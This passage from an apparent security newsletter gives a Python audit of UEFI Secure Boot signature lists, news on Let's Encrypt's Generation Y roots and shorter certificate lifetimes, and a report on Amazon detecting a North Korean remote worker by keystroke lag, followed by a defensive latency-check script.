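    """A dbx that matches the guidance holds only SHA-256 revocation hashes.
    x509 entries are legal per spec but unusual there, so they and anything
    else that is not a 32-byte hash are returned for review."""
    return [e for e in entries if e[0] != "sha256" or len(e[2]) != 32]


def build_esl(sig_type, owner, datas):
    """Construct one EFI_SIGNATURE_LIST with no signature header (sample only)."""
    sig_size = 16 + len(datas[0])
    body = b"".join(owner.bytes_le + d for d in datas)
    return ESL_HEADER.pack(sig_type.bytes_le, ESL_HEADER.size + len(body), 0, sig_size) + body


# Constructed sample: two revocation hashes plus a stray x509 entry.
OWNER = uuid.UUID("11111111-2222-3333-4444-555555555555")  # made-up SignatureOwner
SAMPLE_DBX = (
    build_esl(EFI_CERT_SHA256_GUID, OWNER,
              [hashlib.sha256(b"revoked-image-1").digest(), hashlib.sha256(b"revoked-image-2").digest()])
    + build_esl(EFI_CERT_X509_GUID, OWNER, [b"\x30\x82" + b"A" * 22])  # fake DER, not a real cert
)

if __name__ == "__main__":
    for kind, owner, data in parse_esl(SAMPLE_DBX):
        print(f"{kind:7} owner={owner} bytes={len(data)}")
    print("entries needing review:", len(audit_dbx(parse_esl(SAMPLE_DBX))))
```

Comparing against a baseline is then a set operation over the returned tuples: hash the x509 entries in db and diff them against the certificates you expect (the Microsoft 2011 and 2023 CAs), and alert on anything in PK or KEK whose owner GUID you do not recognise. Secure Boot state itself is the single byte in SecureBoot-8be4df61-93ca-11d2-aa0d-00e098032b8c, which should read 1 once the attribute prefix is stripped.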
Let’s Encrypt’s “Generation Y” Roots & 45-Day Certs
Let’s Encrypt has announced a new “Generation Y” root hierarchy, along with a multi-year plan to shorten certificate lifetimes and retire TLS client authentication from its public issuance profiles. The new structure introduces two Root CAs and six Intermediates cross-signed by the existing X1 and X2 roots, maintaining broad trust while removing the TLS Client Authentication EKU in line with upcoming browser and root program mandates.
Rollout is profile-driven: classic users move to Generation Y by May 13, 2026, while the tlsserver and shortlived profiles start using Gen Y sooner and gain access to short-lived certificates with IP address support. Let’s Encrypt plans an opt-in 45-day validity for early adopters in 2026, with default lifetimes dropping to 64 days in 2027 and 45 days in 2028 to reduce key compromise risk and better align with CA/Browser Forum Baseline Requirements.
Read more: https://cybersecuritynews.com/lets-encrypt-unveils-new-generation-y-root/
Amazon Nabs North Korean IT Infiltrator via Keystroke Lag
Amazon recently uncovered a North Korean operative posing as a U.S.-based systems administrator for a contractor after security tools flagged a tiny but suspicious delay in keystroke transmissions. Commands that should have traversed the network in under 100 milliseconds were consistently arriving at more than 110 milliseconds, signaling that the laptop—physically in Arizona—was being remotely controlled from overseas.
Further investigation tied the activity to broader DPRK “remote IT worker” schemes that use fake identities, resume patterns, and U.S. proxies (or “laptop farms”) to bypass sanctions and funnel income into weapons programs. Amazon’s CSO disclosed that since April 2024 the company has blocked over 1,800 suspected North Korean job attempts, with such infiltration efforts rising about 27% each quarter, underscoring the need for deeper vetting and telemetry-based location checks beyond simple IP verification.
Read more: https://cybersecuritynews.com/amazon-catches-north-korean-it-worker/
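The signal in that story is not a single slow command but the absence of any fast one. As an added example, not Amazon’s tooling, the Python below applies that test to per-session round-trip times: a session is flagged only when nearly every sample exceeds the latency the path is known to meet, so ordinary jitter spikes do not trip it while a consistently relayed laptop does. The session names and timings are constructed.

```python
"""Baseline check for the latency tell described above.

Added example, not Amazon's detection tooling. Assumes you already collect
per-session round-trip times for interactive commands (for example from a
bastion host or session recorder); the sample values are constructed.
"""
from statistics import median


def consistently_slow(samples_ms, ceiling_ms=100.0, fraction=0.9):
    """True when at least `fraction` of the samples exceed the ceiling the
    network path is known to meet. A few slow samples are ordinary jitter;
    nearly all of them slow means every round trip pays for an extra hop,
    which is what a laptop relayed to an overseas operator looks like."""
    if not samples_ms:
        return False
    slow = sum(1 for s in samples_ms if s > ceiling_ms)
    return slow / len(samples_ms) >= fraction


def flag_sessions(sessions, ceiling_ms=100.0, fraction=0.9):
    """Summarise each session with its median RTT and the flag decision."""
    return {
        sid: {"median_ms": median(rtts), "flagged": consistently_slow(rtts, ceiling_ms, fraction)}
        for sid, rtts in sessions.items()
    }


# Constructed sessions: a genuine in-state user with one jitter spike, and a
# relayed session that is only slightly slower but slower every single time.
SESSIONS = {
    "laptop-az-local": [62, 71, 58, 66, 240, 64, 60, 69, 63, 61],
    "laptop-az-relayed": [112, 118, 115, 121, 113, 117, 114, 119, 116, 112],
}

if __name__ == "__main__":
    for sid, summary in flag_sessions(SESSIONS).items():
        print(sid, summary)
```

Note what the two sessions look like on cruder metrics: the genuine user’s worst sample (240 ms) is far slower than anything in the relayed session, so an alert on the maximum fires on the wrong one, and the relayed session’s median is only about 50 ms worse than the local one’s. The fraction-above-ceiling test singles out the session that is slow every time, which is the property a relay cannot hide.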